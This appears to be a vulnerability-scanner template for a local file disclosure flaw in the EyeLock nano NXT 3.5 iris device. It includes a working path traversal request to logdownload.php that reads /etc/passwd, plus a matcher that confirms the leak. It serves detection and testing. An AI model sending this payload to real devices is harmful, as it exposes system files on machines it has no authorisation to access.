id: eyelock-nano-lfd info: name: EyeLock nano NXT 3.5 - Local File Disclosure author: geeknik severity: high description: EyeLock nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: - https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock requests: - method: GET path: - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body # Enhanced by mp on 2022/04/08